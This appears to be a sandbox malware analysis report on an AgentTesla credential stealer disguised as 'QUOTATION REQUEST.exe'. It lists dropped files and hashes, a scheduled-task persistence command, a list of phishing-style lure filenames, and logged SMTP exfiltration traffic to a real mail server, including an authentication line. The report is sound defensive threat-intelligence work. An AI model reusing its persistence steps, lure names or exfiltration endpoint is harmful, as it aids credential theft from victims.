                                                                SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                MD5:8C0458BB9EA02D50565175E38D577E35
                                                                SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                C:\Users\user\AppData\Local\Temp\tmpCA2.tmp
                                                                Process:C:\Users\user\Desktop\QUOTATION REQUEST.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1643
                                                                Entropy (8bit):5.191525678114239
                                                                Encrypted:false
                                                                SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBdtn:cbh47TlNQ//rydbz9I3YODOLNdq31
                                                                MD5:D155A8C3722582775D0A09941D62E98E
                                                                SHA1:C9CE75D6052B7F44106E2F9368ABF53188820A5E
                                                                SHA-256:B43968CF5253F83119264249CE652A2E5185CA84849315690B7603553876346B
                                                                SHA-512:12474769D5AFAA771441139D8FEE5F7AE4388F493FADC13E6DF2F37F0EFE76073711C9500D25C4F3F2C4938EF9BD64F5AB40841C6D5A862A3B1E6C11B347E5A9
                                                                Malicious:true
                                                                Reputation:low
                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                C:\Users\user\AppData\Roaming\GtVSibeZGs.exe
                                                                Process:C:\Users\user\Desktop\QUOTATION REQUEST.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1733120
                                                                Entropy (8bit):7.16299397416884
                                                                Encrypted:false
                                                                SSDEEP:24576:5PrSLG9a8dlo91UFpecAFM1rWBJs0gb9m7:5PrSi888Waed9m7
                                                                MD5:4F4F697ADC79894CEEC42D5752B2790E
                                                                SHA1:390DE0E89B8C1C3D07DBD12DBB0149626453D12B
                                                                SHA-256:DC0CFF9E3BC575333097988F46E46F1925CEDF35329A749A642576601A45674C
                                                                SHA-512:DFF267C9EB3390F161E52841F8059CCF8EBF947A4F228265D16640A05CFB90B472EA9C6CB6A854CAE989CCAE728E3E2B52BC393BE1AFD19F873FE261DDB186B2
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 52%
                                                                Reputation:low
                                                                C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):45152
                                                                Entropy (8bit):6.149629800481177
                                                                Encrypted:false
                                                                SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                                MD5:2867A3817C9245F7CF518524DFD18F28
                                                                SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                                SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                                SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                                Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: kAUs7lSQgh.exe, Detection: malicious
• Filename: Invoice 802737.exe, Detection: malicious
• Filename: order SS21-031 - A30.exe, Detection: malicious
• Filename: SOA.exe, Detection: malicious
• Filename: updated statement of account showing a balance due.exe, Detection: malicious
• Filename: INV.NO.213242021.exe, Detection: malicious
• Filename: INV.NO.213000242021.exe, Detection: malicious
• Filename: pdf.exe, Detection: malicious
• Filename: statement of account.exe, Detection: malicious
• Filename: FINAL DOC.exe, Detection: malicious
• Filename: 0nv9EKtCMv.exe, Detection: malicious
• Filename: XbJ1zfehhU.exe, Detection: malicious
• Filename: RC2jmpuEYE.exe, Detection: malicious
• Filename: QUATATION INQUIRY.exe, Detection: malicious
• Filename: SOA of AUGUST 2020.exe, Detection: malicious
• Filename: Quotation Inquiry.exe, Detection: malicious
• Filename: 770k.exe, Detection: malicious
• Filename: c9AwI0x6lR.exe, Detection: malicious
• Filename: HoNa6vG013.exe, Detection: malicious
• Filename: SHIPPING DOCS..exe, Detection: malicious
                                                                Reputation:moderate, very likely benign file
                                                                C:\Windows\System32\drivers\etc\hosts
                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):11
                                                                Entropy (8bit):2.663532754804255
                                                                Encrypted:false
                                                                SSDEEP:3:iLE:iLE
                                                                MD5:B24D295C1F84ECBFB566103374FB91C5
                                                                SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                                                SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                                                SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                                                Malicious:true
                                                                Reputation:moderate, very likely benign file
                                                                Preview: ..127.0.0.1
                                                                \Device\ConDrv
                                                                Process:C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1141
                                                                Entropy (8bit):4.44831826838854
                                                                Encrypted:false
                                                                SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                                                MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                                                SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                                                SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                                                SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.16299397416884
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: QUOTATION REQUEST.exe
File size: 1733120
MD5: 4f4f697adc79894ceec42d5752b2790e
SHA1: 390de0e89b8c1c3d07dbd12dbb0149626453d12b
SHA256: dc0cff9e3bc575333097988f46e46f1925cedf35329a749a642576601a45674c
SHA512: dff267c9eb3390f161e52841f8059ccf8ebf947a4f228265d16640a05cfb90b472ea9c6cb6a854cae989ccae728e3e2b52bc393be1afd19f873fe261ddb186b2
SSDEEP: 24576:5PrSLG9a8dlo91UFpecAFM1rWBJs0gb9m7:5PrSi888Waed9m7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P.._................................. ........@.. ....................................@................................

File Icon

Icon Hash: 1dbaf06060e0c2cc

Static PE Info

General

Entrypoint: 0x53ef1e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5FB7E850 [Fri Nov 20 16:01:20 2020 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(The line above is repeated 97 times in the original listing. The entrypoint is the usual .NET loader stub: a single jmp through the IAT entry at RVA 0x2000, which holds the only import, mscoree.dll!_CorExeMain; the bytes that follow are zero padding, and 00 00 disassembles as add byte ptr [eax], al.)

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13eecc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x140000 | 0x69da8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1aa000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x13cf24 | 0x13d000 | False | 0.600012168523 | data | 7.33255664693 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x140000 | 0x69da8 | 0x69e00 | False | 0.226857659386 | data | 5.50599821822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1aa000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x140268 | 0x42028 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 889192448, next used block 872415232 | |
RT_ICON | 0x182290 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 721420288, next used block 721420288 | |
RT_ICON | 0x192ab8 | 0x94a8 | data | |
RT_ICON | 0x19bf60 | 0x5488 | data | |
RT_ICON | 0x1a13e8 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 128, next used block 0 | |
RT_ICON | 0x1a5610 | 0x25a8 | data | |
RT_ICON | 0x1a7bb8 | 0x10a8 | data | |
RT_ICON | 0x1a8c60 | 0x988 | data | |
RT_ICON | 0x1a95e8 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0x1a9a50 | 0x84 | data | |
RT_VERSION | 0x1a9ad4 | 0x2d4 | data | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | 5
Assembly Version | 6.6.1.6
InternalName | .exe
FileVersion | 6.6.1.6
CompanyName | FILE
LegalTrademarks | DOC
Comments | d
ProductName | G
ProductVersion | 6.6.1.6
FileDescription | HI
OriginalFilename | .exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/22/20-08:26:51.209330 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49738 | 587 | 192.168.2.3 | 107.6.134.138

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2020 08:26:34.073470116 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:34.190696955 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:34.192318916 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:39.856792927 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:39.858262062 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:39.975436926 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:50.387294054 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:50.389955997 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:50.507181883 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:50.573896885 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:50.575098038 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:50.692245007 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:50.743221998 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:50.744074106 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:50.861152887 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:50.897022963 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:50.897711039 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:51.053158045 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:51.053877115 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:51.207425117 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:51.209330082 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:51.209618092 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:51.210664034 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:51.210798025 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138
Nov 22, 2020 08:26:51.326652050 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:51.333277941 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:51.452657938 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3
Nov 22, 2020 08:26:51.505564928 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2020 08:24:50.245567083 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:50.281258106 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:51.614773989 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:51.652817965 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:52.413269043 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:52.449085951 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:53.320662022 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:53.356560946 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:54.264661074 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:54.300576925 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:54.994679928 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:55.030216932 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:55.741210938 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:55.777076960 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:56.643266916 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:56.670463085 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:57.319308996 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:57.355084896 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:58.132289886 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:58.159516096 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:58.967287064 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:59.003216028 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:24:59.856197119 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:24:59.883467913 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:25:00.512918949 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:25:00.540184975 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:25:01.332098961 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:25:01.367949963 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:25:16.150660038 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:25:16.178002119 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:25:28.083158016 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:25:28.121965885 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:25:30.707740068 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:25:30.751581907 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:25:39.923327923 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:25:39.950448990 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:25:40.038475990 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:25:40.065584898 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:25:50.122220039 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:25:50.189070940 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:25:52.914247990 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:25:52.951704979 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:26:24.505932093 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:26:24.533684969 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:26:26.002520084 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:26:26.052819967 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Nov 22, 2020 08:26:33.900507927 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Nov 22, 2020 08:26:34.056978941 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 22, 2020 08:26:33.900507927 CET | 192.168.2.3 | 8.8.8.8 | 0x8e7a | Standard query (0) | mail.hemetek.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 22, 2020 08:26:34.056978941 CET | 8.8.8.8 | 192.168.2.3 | 0x8e7a | No error (0) | mail.hemetek.com | | 107.6.134.138 | A (IP address) | IN (0x0001)

SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 22, 2020 08:26:39.856792927 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3 | 220-dotsmail.itsoul.com ESMTP Exim 4.93 #2 Sun, 22 Nov 2020 12:56:38 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 22, 2020 08:26:39.858262062 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138 | EHLO 609290
Nov 22, 2020 08:26:50.387294054 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3 | 250-dotsmail.itsoul.com Hello 609290 - 84.17.52.25 - [127.0.0.1]
    250-STARTTLS
    250-SIZE 52428800
    250-8BITMIME
    250-AUTH PLAIN LOGIN
    250-SIZE 52428800
    250 HELP
Nov 22, 2020 08:26:50.389955997 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138 | AUTH login ZGVsQGhlbWV0ZWsuY29t
Nov 22, 2020 08:26:50.573896885 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3 | 334 UGFzc3dvcmQ6
Nov 22, 2020 08:26:50.743221998 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3 | 235 Authentication succeeded
Nov 22, 2020 08:26:50.744074106 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138 | MAIL FROM:<del@hemetek.com>
Nov 22, 2020 08:26:50.897022963 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3 | 250 OK
Nov 22, 2020 08:26:50.897711039 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138 | RCPT TO:<del@hemetek.com>
Nov 22, 2020 08:26:51.053158045 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3 | 250 Accepted
Nov 22, 2020 08:26:51.053877115 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138 | DATA
Nov 22, 2020 08:26:51.207425117 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself
Nov 22, 2020 08:26:51.210798025 CET | 49738 | 587 | 192.168.2.3 | 107.6.134.138 | .
Nov 22, 2020 08:26:51.452657938 CET | 587 | 49738 | 107.6.134.138 | 192.168.2.3 | 250 OK id=1kgjlq-0000xl-99

Code Manipulations

Statistics

Behavior

                                                                System Behavior

                                                                General

                                                                Start time:08:24:54
                                                                Start date:22/11/2020
                                                                Path:C:\Users\user\Desktop\QUOTATION REQUEST.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
                                                                Imagebase:0x3c0000
                                                                File size:1733120 bytes
                                                                MD5 hash:4F4F697ADC79894CEEC42D5752B2790E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.212271069.0000000002B21000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                General

                                                                Start time:08:25:01
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
                                                                Imagebase:0xb60000
                                                                File size:185856 bytes
                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:08:25:01
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6b2800000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:08:25:02
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:{path}
                                                                Imagebase:0xef0000
                                                                File size:45152 bytes
                                                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:moderate

                                                                General

                                                                Start time:08:25:30
                                                                Start date:22/11/2020
                                                                Path:C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe'
                                                                Imagebase:0x640000
                                                                File size:45152 bytes
                                                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Antivirus matches:
                                                                 • Detection: 0%, Metadefender
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

                                                                General

                                                                Start time:08:25:30
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6b2800000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:08:25:38
                                                                Start date:22/11/2020
                                                                Path:C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe'
                                                                Imagebase:0x5a0000
                                                                File size:45152 bytes
                                                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:moderate

                                                                General

                                                                Start time:08:25:38
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6b2800000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
